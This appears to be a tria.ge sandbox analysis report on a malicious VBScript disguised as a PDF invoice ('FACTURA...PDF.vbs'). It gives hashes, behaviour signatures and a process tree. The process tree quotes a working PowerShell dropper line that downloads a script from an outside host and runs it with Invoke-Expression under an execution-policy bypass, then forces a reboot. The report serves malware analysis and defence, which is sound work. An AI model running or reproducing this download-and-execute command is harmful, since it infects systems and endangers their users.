Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

FACTURAgzn...DF.vbs

windows7-x64

FACTURAgzn...DF.vbs

windows10-2004-x64

Analysis

  • max time kernel
    33s
  • max time network
    41s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/11/2023, 00:08

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    FACTURAgzneih0__Ikb_(295).PDF.vbs

  • Size

    781B

  • MD5

    498f2220d6962b5b49fc6c2750610a90

  • SHA1

    06485ce9a6ba48a240c712497900a4240385ea02

  • SHA256

    36c56e3a9202c35e76a3ed10d00650c821b6ee9e1b3834fbab5fa5047d1ee99c

  • SHA512

    e7bd5952c327938e373811d3979c3a930d20782a9d8fc06f5f315da87f43ca02e3db86f65aaafebf63c86800df5733005f67db5a6dbf4546fd17ce4ed9649e42

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://dftssa.3utilities.com/03/17

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURAgzneih0__Ikb_(295).PDF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dftssa.3utilities.com/03/17')"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Windows\system32\shutdown.exe
        "C:\Windows\system32\shutdown.exe" /r /t 15
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4228
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39a9055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:4544

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0idzed53.ku0.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/400-9-0x00000212DD340000-0x00000212DD362000-memory.dmp

    Filesize

    136KB

    Download

  • memory/400-10-0x00007FF99C210000-0x00007FF99CCD1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/400-11-0x00000212DD1E0000-0x00000212DD1F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/400-12-0x00000212DD1E0000-0x00000212DD1F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/400-13-0x00000212DD1E0000-0x00000212DD1F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/400-14-0x00000212F7DB0000-0x00000212F7E26000-memory.dmp

    Filesize

    472KB

    Download

  • memory/400-15-0x00000212F79C0000-0x00000212F79DE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/400-33-0x00000212F7E30000-0x00000212F7E42000-memory.dmp

    Filesize

    72KB

    Download

  • memory/400-34-0x00000212F7D90000-0x00000212F7D9A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/400-65-0x00000212DD1E0000-0x00000212DD1F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/400-71-0x00007FF99C210000-0x00007FF99CCD1000-memory.dmp

    Filesize

    10.8MB

    Download